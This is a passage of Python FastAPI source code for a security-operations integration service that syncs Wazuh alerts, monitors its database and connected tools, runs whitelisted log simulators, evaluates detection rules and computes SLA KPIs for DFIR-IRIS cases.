  1448. ) -> ApiResponse:
  1449. try:
  1450. result = await mvp_service.sync_wazuh_alerts(query=q, limit=limit, minutes=minutes)
  1451. except Exception as exc:
  1452. raise HTTPException(status_code=502, detail=f"Wazuh sync failed: {exc}") from exc
  1453. return ApiResponse(data={"sync": result})
  1454. @app.get(
  1455. "/wazuh/auto-sync/status",
  1456. response_model=ApiResponse,
  1457. summary="Wazuh auto-sync status",
  1458. description="Show auto-sync enablement, settings, task runtime state, and last sync result.",
  1459. )
  1460. async def wazuh_auto_sync_status() -> ApiResponse:
  1461. state = getattr(app.state, "wazuh_auto_sync_state", {})
  1462. task = getattr(app.state, "wazuh_auto_sync_task", None)
  1463. return ApiResponse(
  1464. data={
  1465. "enabled": settings.wazuh_auto_sync_enabled,
  1466. "task_running": bool(task and not task.done()),
  1467. "settings": {
  1468. "interval_seconds": settings.wazuh_auto_sync_interval_seconds,
  1469. "limit": settings.wazuh_auto_sync_limit,
  1470. "minutes": settings.wazuh_auto_sync_minutes,
  1471. "query": settings.wazuh_auto_sync_query,
  1472. },
  1473. "state": state,
  1474. }
  1475. )
  1476. @app.get(
  1477. "/monitor/db/tables",
  1478. response_model=ApiResponse,
  1479. dependencies=[Depends(require_internal_api_key)],
  1480. summary="List database tables",
  1481. description="List soc-integrator PostgreSQL tables with row count and relation size.",
  1482. )
  1483. async def monitor_db_tables() -> ApiResponse:
  1484. rows: list[dict[str, object]] = []
  1485. with get_conn() as conn, conn.cursor() as cur:
  1486. cur.execute(
  1487. """
  1488. SELECT
  1489. t.schemaname,
  1490. t.tablename,
  1491. COALESCE(s.n_live_tup, 0)::BIGINT AS estimated_rows,
  1492. COALESCE(pg_total_relation_size(format('%I.%I', t.schemaname, t.tablename)), 0)::BIGINT AS size_bytes,
  1493. COALESCE(pg_size_pretty(pg_total_relation_size(format('%I.%I', t.schemaname, t.tablename))), '0 bytes') AS size_pretty
  1494. FROM pg_tables t
  1495. LEFT JOIN pg_stat_user_tables s
  1496. ON s.schemaname = t.schemaname
  1497. AND s.relname = t.tablename
  1498. WHERE t.schemaname = 'public'
  1499. ORDER BY t.tablename
  1500. """
  1501. )
  1502. tables = cur.fetchall()
  1503. for item in tables:
  1504. schema = str(item.get("schemaname") or "public")
  1505. table = str(item.get("tablename") or "")
  1506. if not table:
  1507. continue
  1508. cur.execute(
  1509. sql.SQL("SELECT COUNT(*) AS cnt FROM {}.{}").format(
  1510. sql.Identifier(schema),
  1511. sql.Identifier(table),
  1512. )
  1513. )
  1514. count_row = cur.fetchone() or {}
  1515. row_count = int(count_row.get("cnt", 0) or 0)
  1516. rows.append(
  1517. {
  1518. "schema": schema,
  1519. "table": table,
  1520. "row_count": row_count,
  1521. "estimated_rows": int(item.get("estimated_rows", 0) or 0),
  1522. "size_bytes": int(item.get("size_bytes", 0) or 0),
  1523. "size_pretty": str(item.get("size_pretty") or "0 bytes"),
  1524. }
  1525. )
  1526. return ApiResponse(
  1527. data={
  1528. "database": settings.soc_integrator_db_name,
  1529. "generated_at": datetime.now(timezone.utc).isoformat(),
  1530. "tables": rows,
  1531. }
  1532. )
  1533. @app.get(
  1534. "/monitor/db/tables/{table_name}/rows",
  1535. response_model=ApiResponse,
  1536. dependencies=[Depends(require_internal_api_key)],
  1537. summary="List rows from selected table",
  1538. description="Return rows from a selected public table with pagination.",
  1539. )
  1540. async def monitor_db_table_rows(
  1541. table_name: str,
  1542. limit: int = 50,
  1543. offset: int = 0,
  1544. ) -> ApiResponse:
  1545. table = str(table_name or "").strip()
  1546. if not table:
  1547. raise HTTPException(status_code=400, detail="table_name is required")
  1548. page_limit = max(1, min(int(limit), 500))
  1549. page_offset = max(0, int(offset))
  1550. with get_conn() as conn, conn.cursor() as cur:
  1551. cur.execute(
  1552. """
  1553. SELECT 1
  1554. FROM pg_tables
  1555. WHERE schemaname = 'public' AND tablename = %s
  1556. LIMIT 1
  1557. """,
  1558. (table,),
  1559. )
  1560. if not cur.fetchone():
  1561. raise HTTPException(status_code=404, detail=f"table '{table}' not found in schema public")
  1562. cur.execute(
  1563. sql.SQL("SELECT COUNT(*) AS cnt FROM {}.{}").format(
  1564. sql.Identifier("public"),
  1565. sql.Identifier(table),
  1566. )
  1567. )
  1568. total_row = cur.fetchone() or {}
  1569. total = int(total_row.get("cnt", 0) or 0)
  1570. cur.execute(
  1571. sql.SQL("SELECT * FROM {}.{} ORDER BY 1 DESC LIMIT %s OFFSET %s").format(
  1572. sql.Identifier("public"),
  1573. sql.Identifier(table),
  1574. ),
  1575. (page_limit, page_offset),
  1576. )
  1577. rows = [dict(item) for item in (cur.fetchall() or [])]
  1578. return ApiResponse(
  1579. data={
  1580. "table": table,
  1581. "limit": page_limit,
  1582. "offset": page_offset,
  1583. "total": total,
  1584. "rows": rows,
  1585. }
  1586. )
  1587. @app.get(
  1588. "/monitor/systems",
  1589. response_model=ApiResponse,
  1590. dependencies=[Depends(require_internal_api_key)],
  1591. summary="Systems monitor overview",
  1592. description="Unified monitoring snapshot for Wazuh, Shuffle, IRIS, and PagerDuty with pipeline KPIs and recent records.",
  1593. )
  1594. async def monitor_systems(
  1595. minutes: int = 60,
  1596. limit: int = 20,
  1597. include_raw: bool = False,
  1598. ) -> ApiResponse:
  1599. window_minutes = max(1, minutes)
  1600. row_limit = max(1, limit)
  1601. now = datetime.now(timezone.utc)
  1602. since = now - timedelta(minutes=window_minutes)
  1603. now_iso = now.isoformat()
  1604. dependencies = await mvp_service.dependency_health()
  1605. monitor_state = getattr(app.state, "systems_monitor_state", {"last_ok_at": {}})
  1606. last_ok_at_by_key = monitor_state.setdefault("last_ok_at", {})
  1607. # KPI counters from persisted database records in the selected lookback window.
  1608. alerts_ingested = repo.count_incident_events_since(since=since, source="wazuh")
  1609. detections_matched = repo.count_c_detection_events_since(since=since)
  1610. iris_tickets_created = repo.count_incidents_with_iris_since(since=since)
  1611. pagerduty_escalations_sent = repo.count_escalations_since(since=since, success=True)
  1612. pagerduty_escalations_failed = repo.count_escalations_since(since=since, success=False)
  1613. wazuh_recent: list[object] = []
  1614. wazuh_recent_error: str | None = None
  1615. try:
  1616. wazuh_resp = await wazuh_adapter.list_manager_logs(limit=row_limit, offset=0, q=None, sort=None)
  1617. wazuh_recent = _extract_first_array(wazuh_resp)[:row_limit]
  1618. except Exception as exc:
  1619. wazuh_recent_error = str(exc)
  1620. shuffle_recent: list[object] = []
  1621. shuffle_recent_error: str | None = None
  1622. try:
  1623. workflows_resp = await shuffle_adapter.list_workflows()
  1624. workflows = _extract_first_array(workflows_resp)
  1625. for item in workflows[:row_limit]:
  1626. if isinstance(item, dict):
  1627. shuffle_recent.append(
  1628. {
  1629. "id": item.get("id") or item.get("workflow_id"),
  1630. "name": item.get("name") or item.get("workflow", {}).get("name"),
  1631. "status": item.get("status"),
  1632. }
  1633. )
  1634. else:
  1635. shuffle_recent.append(item)
  1636. except Exception as exc:
  1637. shuffle_recent_error = str(exc)
  1638. iris_recent: list[object] = []
  1639. iris_recent_error: str | None = None
  1640. try:
  1641. iris_resp = await iris_adapter.list_cases(limit=row_limit, offset=0)
  1642. iris_recent = _extract_first_array(iris_resp)[:row_limit]
  1643. except Exception as exc:
  1644. iris_recent_error = str(exc)
  1645. pagerduty_recent = repo.list_recent_escalations(limit=row_limit)
  1646. def build_card(
  1647. label: str,
  1648. dependency_key: str,
  1649. recent: list[object],
  1650. kpis: dict[str, object],
  1651. extra_error: str | None = None,
  1652. ) -> dict[str, object]:
  1653. dep = dependencies.get(dependency_key, {})
  1654. dep_status = str(dep.get("status") or "down")
  1655. status = "ok" if dep_status == "up" else "down"
  1656. if dep_status == "up":
  1657. last_ok_at_by_key[label] = now_iso
  1658. error_parts: list[str] = []
  1659. if dep.get("error"):
  1660. error_parts.append(str(dep.get("error")))
  1661. if extra_error:
  1662. error_parts.append(extra_error)
  1663. if dep_status == "up" and extra_error:
  1664. status = "degraded"
  1665. card: dict[str, object] = {
  1666. "status": status,
  1667. "latency_ms": dep.get("latency_ms"),
  1668. "last_ok_at": last_ok_at_by_key.get(label),
  1669. "last_error": " | ".join(error_parts) if error_parts else None,
  1670. "kpis": kpis,
  1671. "recent": recent,
  1672. }
  1673. if include_raw:
  1674. card["raw"] = dep.get("details")
  1675. return card
  1676. cards = {
  1677. "wazuh": build_card(
  1678. label="wazuh",
  1679. dependency_key="wazuh",
  1680. recent=wazuh_recent,
  1681. extra_error=wazuh_recent_error,
  1682. kpis={
  1683. "alerts_ingested": alerts_ingested,
  1684. "recent_rows": len(wazuh_recent),
  1685. },
  1686. ),
  1687. "shuffle": build_card(
  1688. label="shuffle",
  1689. dependency_key="shuffle",
  1690. recent=shuffle_recent,
  1691. extra_error=shuffle_recent_error,
  1692. kpis={
  1693. "recent_workflows": len(shuffle_recent),
  1694. },
  1695. ),
  1696. "iris": build_card(
  1697. label="iris",
  1698. dependency_key="iris",
  1699. recent=iris_recent,
  1700. extra_error=iris_recent_error,
  1701. kpis={
  1702. "tickets_created": iris_tickets_created,
  1703. "recent_rows": len(iris_recent),
  1704. },
  1705. ),
  1706. "pagerduty": build_card(
  1707. label="pagerduty",
  1708. dependency_key="pagerduty_stub",
  1709. recent=pagerduty_recent,
  1710. kpis={
  1711. "escalations_sent": pagerduty_escalations_sent,
  1712. "escalations_failed": pagerduty_escalations_failed,
  1713. },
  1714. ),
  1715. }
  1716. app.state.systems_monitor_state = monitor_state
  1717. return ApiResponse(
  1718. data={
  1719. "generated_at": now_iso,
  1720. "window_minutes": window_minutes,
  1721. "cards": cards,
  1722. "pipeline": {
  1723. "alerts_ingested": alerts_ingested,
  1724. "detections_matched": detections_matched,
  1725. "iris_tickets_created": iris_tickets_created,
  1726. "pagerduty_escalations_sent": pagerduty_escalations_sent,
  1727. "pagerduty_escalations_failed": pagerduty_escalations_failed,
  1728. },
  1729. }
  1730. )
  1731. @app.get(
  1732. "/sim/logs/runs",
  1733. response_model=ApiResponse,
  1734. dependencies=[Depends(require_internal_api_key)],
  1735. summary="List simulator runs",
  1736. description="List active and recent simulator script runs started from soc-integrator.",
  1737. )
  1738. async def sim_logs_runs() -> ApiResponse:
  1739. sim_runs: dict[str, dict[str, object]] = getattr(app.state, "sim_runs", {})
  1740. items: list[dict[str, object]] = []
  1741. for run_id, run in sim_runs.items():
  1742. serialized = _serialize_sim_run(run_id, run)
  1743. if (not serialized["running"]) and not run.get("stopped_at"):
  1744. run["stopped_at"] = datetime.now(timezone.utc).isoformat()
  1745. serialized["stopped_at"] = run["stopped_at"]
  1746. items.append(serialized)
  1747. items.sort(key=lambda x: str(x.get("started_at") or ""), reverse=True)
  1748. return ApiResponse(data={"items": items})
  1749. @app.post(
  1750. "/sim/logs/start",
  1751. response_model=ApiResponse,
  1752. dependencies=[Depends(require_internal_api_key)],
  1753. summary="Start simulator logs script",
  1754. description="Start a whitelisted simulator script in background and return run metadata.",
  1755. )
  1756. async def sim_logs_start(payload: SimLogRunRequest) -> ApiResponse:
  1757. script_name = SIM_SCRIPT_MAP[payload.script]
  1758. script_path = SIM_SCRIPTS_DIR / script_name
  1759. if not script_path.exists():
  1760. raise HTTPException(status_code=400, detail=f"Simulator script not found in container: {script_name}")
  1761. cmd = _build_sim_command(payload)
  1762. env = dict(os.environ)
  1763. env.setdefault("WAZUH_SYSLOG_HOST", "wazuh.manager")
  1764. env.setdefault("WAZUH_SYSLOG_PORT", "514")
  1765. run_id = str(uuid.uuid4())
  1766. log_file = SIM_RUN_LOGS_DIR / f"{run_id}.log"
  1767. log_handle = None
  1768. try:
  1769. log_handle = log_file.open("ab")
  1770. process = subprocess.Popen(
  1771. cmd,
  1772. cwd=str(SIM_SCRIPTS_DIR),
  1773. env=env,
  1774. stdout=log_handle,
  1775. stderr=subprocess.STDOUT,
  1776. start_new_session=True,
  1777. )
  1778. except Exception as exc:
  1779. if log_handle:
  1780. try:
  1781. log_handle.close()
  1782. except Exception:
  1783. pass
  1784. raise HTTPException(status_code=502, detail=f"Failed to start simulator: {exc}") from exc
  1785. finally:
  1786. if log_handle:
  1787. log_handle.close()
  1788. sim_runs: dict[str, dict[str, object]] = getattr(app.state, "sim_runs", {})
  1789. sim_runs[run_id] = {
  1790. "script": payload.script,
  1791. "target": payload.target,
  1792. "scenario": payload.scenario,
  1793. "count": payload.count,
  1794. "delay_seconds": payload.delay_seconds,
  1795. "forever": payload.forever,
  1796. "pid": process.pid,
  1797. "cmd": " ".join(shlex.quote(part) for part in cmd),
  1798. "started_at": datetime.now(timezone.utc).isoformat(),
  1799. "stopped_at": None,
  1800. "return_code": None,
  1801. "log_file": str(log_file),
  1802. "process": process,
  1803. }
  1804. app.state.sim_runs = sim_runs
  1805. return ApiResponse(data={"run": _serialize_sim_run(run_id, sim_runs[run_id])})
  1806. @app.post(
  1807. "/sim/logs/stop/{run_id}",
  1808. response_model=ApiResponse,
  1809. dependencies=[Depends(require_internal_api_key)],
  1810. summary="Stop simulator run",
  1811. description="Stop a running simulator script by run_id.",
  1812. )
  1813. async def sim_logs_stop(run_id: str) -> ApiResponse:
  1814. sim_runs: dict[str, dict[str, object]] = getattr(app.state, "sim_runs", {})
  1815. run = sim_runs.get(run_id)
  1816. if not run:
  1817. raise HTTPException(status_code=404, detail=f"Run not found: {run_id}")
  1818. process = run.get("process")
  1819. if process and process.poll() is None:
  1820. try:
  1821. process.terminate()
  1822. process.wait(timeout=3)
  1823. except subprocess.TimeoutExpired:
  1824. process.kill()
  1825. except Exception as exc:
  1826. raise HTTPException(status_code=502, detail=f"Failed to stop run: {exc}") from exc
  1827. run["stopped_at"] = datetime.now(timezone.utc).isoformat()
  1828. return ApiResponse(data={"run": _serialize_sim_run(run_id, run)})
  1829. @app.post(
  1830. "/sim/logs/stop-running",
  1831. response_model=ApiResponse,
  1832. dependencies=[Depends(require_internal_api_key)],
  1833. summary="Stop all running simulator runs",
  1834. description="Stop all currently running simulator scripts (including forever mode).",
  1835. )
  1836. async def sim_logs_stop_running() -> ApiResponse:
  1837. sim_runs: dict[str, dict[str, object]] = getattr(app.state, "sim_runs", {})
  1838. stopped: list[dict[str, object]] = []
  1839. already_stopped = 0
  1840. for run_id, run in sim_runs.items():
  1841. process = run.get("process")
  1842. if process and process.poll() is None:
  1843. try:
  1844. process.terminate()
  1845. process.wait(timeout=3)
  1846. except subprocess.TimeoutExpired:
  1847. process.kill()
  1848. except Exception as exc:
  1849. raise HTTPException(status_code=502, detail=f"Failed to stop run {run_id}: {exc}") from exc
  1850. run["stopped_at"] = datetime.now(timezone.utc).isoformat()
  1851. stopped.append(_serialize_sim_run(run_id, run))
  1852. else:
  1853. already_stopped += 1
  1854. return ApiResponse(
  1855. data={
  1856. "stopped_count": len(stopped),
  1857. "already_stopped_count": already_stopped,
  1858. "runs": stopped,
  1859. }
  1860. )
  1861. @app.get(
  1862. "/sim/logs/output/{run_id}",
  1863. response_model=ApiResponse,
  1864. dependencies=[Depends(require_internal_api_key)],
  1865. summary="Get simulator run output",
  1866. description="Return tailed output lines from simulator run log file.",
  1867. )
  1868. async def sim_logs_output(run_id: str, limit: int = 200) -> ApiResponse:
  1869. sim_runs: dict[str, dict[str, object]] = getattr(app.state, "sim_runs", {})
  1870. run = sim_runs.get(run_id)
  1871. if not run:
  1872. raise HTTPException(status_code=404, detail=f"Run not found: {run_id}")
  1873. log_file_path = run.get("log_file")
  1874. if not log_file_path:
  1875. raise HTTPException(status_code=404, detail=f"No log file for run: {run_id}")
  1876. log_file = Path(str(log_file_path))
  1877. lines = _tail_log_lines(log_file, limit=limit)
  1878. process = run.get("process")
  1879. running = bool(process and process.poll() is None)
  1880. return ApiResponse(
  1881. data={
  1882. "run_id": run_id,
  1883. "running": running,
  1884. "line_count": len(lines),
  1885. "lines": lines,
  1886. "text": "\n".join(lines),
  1887. "log_file": str(log_file),
  1888. }
  1889. )
  1890. @app.get(
  1891. "/sim/logs/wazuh-latest/{run_id}",
  1892. response_model=ApiResponse,
  1893. dependencies=[Depends(require_internal_api_key)],
  1894. summary="Get latest Wazuh logs/rules for simulator run",
  1895. description="Return latest Wazuh event logs and matched rules correlated to a simulator run.",
  1896. )
  1897. async def sim_logs_wazuh_latest(
  1898. run_id: str,
  1899. limit: int = 50,
  1900. minutes: int = 15,
  1901. include_raw: bool = False,
  1902. ) -> ApiResponse:
  1903. sim_runs: dict[str, dict[str, object]] = getattr(app.state, "sim_runs", {})
  1904. run = sim_runs.get(run_id)
  1905. if not run:
  1906. raise HTTPException(status_code=404, detail=f"Run not found: {run_id}")
  1907. requested_minutes = max(1, int(minutes))
  1908. # Keep query unfiltered and use a wide lookback to emulate Discover "latest records".
  1909. effective_minutes = max(1440, requested_minutes)
  1910. query_limit = max(1, min(int(limit), 200))
  1911. query_text = "*"
  1912. try:
  1913. raw = await wazuh_adapter.search_alerts(
  1914. query=query_text,
  1915. limit=query_limit,
  1916. minutes=effective_minutes,
  1917. )
  1918. except Exception as exc:
  1919. raise HTTPException(status_code=502, detail=f"Wazuh search failed: {exc}") from exc
  1920. hits = _extract_wazuh_hits(raw)
  1921. events = [_extract_wazuh_event_item(hit, include_raw=include_raw) for hit in hits]
  1922. rules: list[dict[str, object]] = []
  1923. for hit in hits:
  1924. rule_item = _extract_wazuh_rule_item(hit, include_raw=include_raw)
  1925. if rule_item:
  1926. rules.append(rule_item)
  1927. return ApiResponse(
  1928. data={
  1929. "run": _serialize_sim_run(run_id, run),
  1930. "query": {
  1931. "effective_minutes": effective_minutes,
  1932. "text": query_text,
  1933. "limit": query_limit,
  1934. },
  1935. "events": events,
  1936. "rules": rules,
  1937. "totals": {
  1938. "events": len(events),
  1939. "rules": len(rules),
  1940. },
  1941. }
  1942. )
  1943. @app.post(
  1944. "/monitor/log-loss/check",
  1945. response_model=ApiResponse,
  1946. dependencies=[Depends(require_internal_api_key)],
  1947. summary="Check log loss",
  1948. description="Check expected telemetry streams for missing logs in a configurable lookback window.",
  1949. )
  1950. async def monitor_log_loss_check(
  1951. payload: LogLossCheckRequest | None = None,
  1952. create_ticket: bool = False,
  1953. ) -> ApiResponse:
  1954. req = payload or LogLossCheckRequest()
  1955. result = await _execute_log_loss_check(req=req, create_ticket=create_ticket)
  1956. return ApiResponse(data=result)
  1957. @app.post(
  1958. "/monitor/c-detections/evaluate",
  1959. response_model=ApiResponse,
  1960. dependencies=[Depends(require_internal_api_key)],
  1961. summary="Evaluate Appendix C detections",
  1962. description="Evaluate C1-C3 detection rules on recent events, optionally creating incidents/tickets.",
  1963. )
  1964. async def monitor_c_detections_evaluate(payload: CDetectionEvaluateRequest) -> ApiResponse:
  1965. if not settings.c_detection_enabled:
  1966. raise HTTPException(status_code=400, detail="C detection is disabled by configuration")
  1967. started_at = datetime.now(timezone.utc).isoformat()
  1968. app.state.c_detection_state["last_started_at"] = started_at
  1969. try:
  1970. raw = await wazuh_adapter.search_alerts(
  1971. query=payload.query,
  1972. limit=max(1, payload.limit),
  1973. minutes=max(1, payload.minutes),
  1974. )
  1975. hits = (raw.get("hits", {}) or {}).get("hits", []) if isinstance(raw, dict) else []
  1976. normalized = [mvp_service.normalize_wazuh_hit(hit) for hit in hits]
  1977. evaluated = await c_detection_service.evaluate(normalized, selectors=payload.selectors)
  1978. records: list[dict[str, object]] = []
  1979. for match in evaluated.get("matches", []):
  1980. usecase_id = str(match.get("usecase_id") or "")
  1981. entity = str(match.get("entity") or "unknown")
  1982. severity = str(match.get("severity") or "medium")
  1983. evidence = dict(match.get("evidence") or {})
  1984. event_ref = {
  1985. "event_id": ((match.get("event") or {}).get("event_id")),
  1986. "timestamp": ((match.get("event") or {}).get("timestamp")),
  1987. "source": ((match.get("event") or {}).get("source")),
  1988. }
  1989. in_cooldown = repo.is_c_detection_in_cooldown(
  1990. usecase_id=usecase_id,
  1991. entity=entity,
  1992. cooldown_seconds=int(settings.c_detection_ticket_cooldown_seconds),
  1993. )
  1994. incident_key: str | None = None
  1995. event_row = repo.add_c_detection_event(
  1996. usecase_id=usecase_id,
  1997. entity=entity,
  1998. severity=severity,
  1999. evidence=evidence,
  2000. event_ref=event_ref,
  2001. incident_key=None,
  2002. )
  2003. if (not payload.dry_run) and settings.c_detection_create_iris_ticket and not in_cooldown:
  2004. incident_event = _c_match_to_incident_event(match)
  2005. ingest = await mvp_service.ingest_incident(incident_event)
  2006. incident_key = str(ingest.get("incident_key") or "") or None
  2007. repo.update_c_detection_incident(int(event_row["id"]), incident_key)
  2008. records.append(
  2009. {
  2010. "id": event_row["id"],
  2011. "usecase_id": usecase_id,
  2012. "entity": entity,
  2013. "severity": severity,
  2014. "incident_key": incident_key,
  2015. "cooldown_active": in_cooldown,
  2016. "evidence": evidence,
  2017. }
  2018. )
  2019. result = {
  2020. "query": payload.query,
  2021. "minutes": max(1, payload.minutes),
  2022. "selectors": payload.selectors,
  2023. "dry_run": payload.dry_run,
  2024. "summary": evaluated.get("summary", {}),
  2025. "matches": records,
  2026. "total_hits": len(hits),
  2027. }
  2028. app.state.c_detection_state["last_status"] = "ok"
  2029. app.state.c_detection_state["last_result"] = result
  2030. app.state.c_detection_state["last_finished_at"] = datetime.now(timezone.utc).isoformat()
  2031. return ApiResponse(data=result)
  2032. except Exception as exc:
  2033. app.state.c_detection_state["last_status"] = "error"
  2034. app.state.c_detection_state["last_error"] = str(exc)
  2035. app.state.c_detection_state["last_finished_at"] = datetime.now(timezone.utc).isoformat()
  2036. raise HTTPException(status_code=502, detail=f"C detection evaluation failed: {exc}") from exc
  2037. @app.get(
  2038. "/monitor/c-detections/history",
  2039. response_model=ApiResponse,
  2040. dependencies=[Depends(require_internal_api_key)],
  2041. summary="C detection history",
  2042. description="List persisted C1-C3 detection matches, including evidence and linked incident keys.",
  2043. )
  2044. async def monitor_c_detections_history(
  2045. limit: int = 50,
  2046. offset: int = 0,
  2047. usecase_id: str | None = None,
  2048. ) -> ApiResponse:
  2049. rows = repo.list_c_detection_events(limit=limit, offset=offset, usecase_id=usecase_id)
  2050. return ApiResponse(data={"items": rows, "limit": max(1, limit), "offset": max(0, offset), "usecase_id": usecase_id})
  2051. @app.get(
  2052. "/monitor/c-detections/state",
  2053. response_model=ApiResponse,
  2054. dependencies=[Depends(require_internal_api_key)],
  2055. summary="C detection state",
  2056. description="Return Appendix C detection settings and last evaluation runtime state.",
  2057. )
  2058. async def monitor_c_detections_state() -> ApiResponse:
  2059. return ApiResponse(
  2060. data={
  2061. "enabled": settings.c_detection_enabled,
  2062. "settings": {
  2063. "window_minutes": settings.c_detection_window_minutes,
  2064. "c1_max_travel_speed_kmph": settings.c1_max_travel_speed_kmph,
  2065. "c2_offhours_start_utc": settings.c2_offhours_start_utc,
  2066. "c2_offhours_end_utc": settings.c2_offhours_end_utc,
  2067. "c3_host_spread_threshold": settings.c3_host_spread_threshold,
  2068. "c3_scan_port_threshold": settings.c3_scan_port_threshold,
  2069. "create_iris_ticket": settings.c_detection_create_iris_ticket,
  2070. "ticket_cooldown_seconds": settings.c_detection_ticket_cooldown_seconds,
  2071. },
  2072. "state": getattr(app.state, "c_detection_state", {}),
  2073. }
  2074. )
  2075. # ---------------------------------------------------------------------------
  2076. # KPI Timeout helpers and IRIS alert routes
  2077. # ---------------------------------------------------------------------------
  2078. SLA_SECONDS: dict[str, int] = {"High": 14400, "Medium": 28800, "Low": 86400}
  2079. def compute_kpi(
  2080. created_at: str,
  2081. severity_name: str,
  2082. resolved_at: str | None = None,
  2083. ) -> dict[str, object]:
  2084. sla = SLA_SECONDS.get(severity_name, 28800)
  2085. def _parse(ts: str) -> datetime:
  2086. dt = datetime.fromisoformat(ts.replace("Z", "+00:00"))
  2087. return dt if dt.tzinfo else dt.replace(tzinfo=timezone.utc)
  2088. start = _parse(created_at)
  2089. thresholds = [("S1", "#22c55e", 25), ("S2", "#eab308", 50), ("S3", "#f97316", 75), ("S4", "#ef4444", 100)]
  2090. if resolved_at:
  2091. end = _parse(resolved_at)
  2092. elapsed = max(0, (end - start).total_seconds()) # clamp: close_date can't precede open_date
  2093. elapsed_pct = min(elapsed / sla * 100, 100)
  2094. kpi_pct = max(100 - elapsed_pct, 0)
  2095. segments = [{"label": l, "color": c, "active": elapsed_pct >= t} for l, c, t in thresholds]
  2096. return {
  2097. "kpi_pct": round(kpi_pct, 1),
  2098. "elapsed_pct": round(elapsed_pct, 1),
  2099. "status": "Resolved",
  2100. "segments": segments,
  2101. "resolved": True,
  2102. }
  2103. elapsed = (datetime.now(timezone.utc) - start).total_seconds()
  2104. elapsed_pct = min(elapsed / sla * 100, 100)
  2105. kpi_pct = max(100 - elapsed_pct, 0)
  2106. segments = [{"label": l, "color": c, "active": elapsed_pct >= t} for l, c, t in thresholds]
  2107. if kpi_pct >= 80:
  2108. status = "On Track"
  2109. elif kpi_pct >= 60:
  2110. status = "Watch"
  2111. elif kpi_pct >= 40:
  2112. status = "Warning"
  2113. elif kpi_pct >= 20:
  2114. status = "Urgent"
  2115. elif kpi_pct > 0:
  2116. status = "Critical"
  2117. else:
  2118. status = "Breached"
  2119. return {
  2120. "kpi_pct": round(kpi_pct, 1),
  2121. "elapsed_pct": round(elapsed_pct, 1),
  2122. "status": status,
  2123. "segments": segments,
  2124. "resolved": False,
  2125. }
  2126. def _enrich_alerts_with_kpi(iris_response: dict) -> dict:
  2127. """Inject kpi field into each alert row returned by IRIS.
  2128. IRIS GET /api/v2/alerts returns: { "total": N, "data": [...], ... }
  2129. """
  2130. alerts = iris_response.get("data", [])
  2131. if not isinstance(alerts, list):
  2132. return iris_response
  2133. for alert in alerts:
  2134. created_at = alert.get("alert_creation_time") or ""
  2135. severity = (alert.get("severity") or {}).get("severity_name", "Medium")
  2136. if not created_at:
  2137. continue
  2138. resolved_at: str | None = None
  2139. if alert.get("alert_resolution_status_id") is not None:
  2140. history: dict = alert.get("modification_history") or {}
  2141. if history:
  2142. last_ts = max(history.keys(), key=lambda k: float(k))
  2143. resolved_at = datetime.fromtimestamp(float(last_ts), tz=timezone.utc).isoformat()
  2144. try:
  2145. alert["kpi"] = compute_kpi(created_at, severity, resolved_at)
  2146. except Exception:
  2147. alert["kpi"] = {"kpi_pct": 0, "elapsed_pct": 100, "status": "Breached", "segments": [], "resolved": False}
  2148. return iris_response
  2149. def _enrich_cases_with_kpi(iris_response: dict) -> dict:
  2150. # v2 cases list: { "data": [...], "total": N, ... }
  2151. # Each case uses open_date / close_date / state.state_name / severity_id
  2152. _CASE_SEV: dict[int, str] = {1: "Medium", 4: "Low", 5: "High", 6: "High"} # severity_id → name
  2153. cases = iris_response.get("data") or iris_response.get("items", [])
  2154. if not isinstance(cases, list):
  2155. return iris_response
  2156. for case in cases:
  2157. created_at = case.get("open_date") or ""
  2158. if not created_at:
  2159. continue
  2160. sev_id = case.get("severity_id") or 1
  2161. severity = _CASE_SEV.get(int(sev_id), "Medium")
  2162. resolved_at = None
  2163. close_date = case.get("close_date")
  2164. state_name = ((case.get("state") or {}).get("state_name") or "").lower()
  2165. if close_date:
  2166. resolved_at = close_date
  2167. elif state_name == "closed":
  2168. resolved_at = created_at
  2169. try:
  2170. case["kpi"] = compute_kpi(created_at, severity, resolved_at)
  2171. except Exception:
  2172. case["kpi"] = {"kpi_pct": 0, "elapsed_pct": 100, "status": "Breached", "segments": [], "resolved": False}
  2173. return iris_response
  2174. @app.get(
  2175. "/iris/cases/export-csv",
  2176. summary="Export IRIS cases as CSV",
  2177. description="Download all cases (up to 1000) with KPI as a CSV attachment.",
  2178. )
  2179. async def iris_export_cases_csv() -> StreamingResponse:
  2180. try:
  2181. raw = await iris_adapter.list_cases(limit=1000, offset=0)
  2182. except Exception as exc:
  2183. raise HTTPException(status_code=502, detail=f"IRIS case export failed: {exc}") from exc
  2184. enriched = _enrich_cases_with_kpi(raw)
  2185. cases = enriched.get("data") or enriched.get("items", [])
  2186. _CASE_SEV: dict[int, str] = {1: "Medium", 4: "Low", 5: "High", 6: "High"}
  2187. output = io.StringIO()
  2188. fieldnames = ["case_id", "case_name", "severity", "state", "open_date", "close_date", "kpi_pct", "kpi_status"]
  2189. writer = csv.DictWriter(output, fieldnames=fieldnames, extrasaction="ignore")
  2190. writer.writeheader()
  2191. for case in cases:
  2192. kpi = case.get("kpi", {})
  2193. writer.writerow({
  2194. "case_id": case.get("case_id", ""),
  2195. "case_name": case.get("case_name", ""),
  2196. "severity": _CASE_SEV.get(int(case.get("severity_id") or 1), "Medium"),
  2197. "state": (case.get("state") or {}).get("state_name", ""),
  2198. "open_date": case.get("open_date", ""),
  2199. "close_date": case.get("close_date", ""),
  2200. "kpi_pct": kpi.get("kpi_pct", ""),
  2201. "kpi_status": kpi.get("status", ""),
  2202. })
  2203. output.seek(0)
  2204. return StreamingResponse(
  2205. iter([output.getvalue()]),
  2206. media_type="text/csv",
  2207. headers={"Content-Disposition": "attachment; filename=iris_cases.csv"},
  2208. )
  2209. @app.get(
  2210. "/iris/cases/{case_id}",
  2211. response_model=ApiResponse,
  2212. summary="Get single IRIS case with KPI",
  2213. description="Fetch one DFIR-IRIS case by ID and annotate with computed KPI data.",
  2214. )
  2215. async def iris_get_case(case_id: int) -> ApiResponse:
  2216. try:
  2217. raw = await iris_adapter.get_case(case_id)
  2218. except Exception as exc:
  2219. raise HTTPException(status_code=502, detail=f"IRIS case fetch failed: {exc}") from exc
  2220. wrapper = {"data": [raw]}
  2221. enriched = _enrich_cases_with_kpi(wrapper)
  2222. case_out = enriched["data"][0] if enriched.get("data") else raw
  2223. return ApiResponse(data={"case": case_out})
  2224. @app.get(
  2225. "/iris/cases",
  2226. response_model=ApiResponse,
  2227. summary="List IRIS cases with KPI",
  2228. description="Fetch cases from DFIR-IRIS and annotate each with computed KPI data.",
  2229. )
  2230. async def iris_list_cases(
  2231. page: int = 1,
  2232. per_page: int = 20,
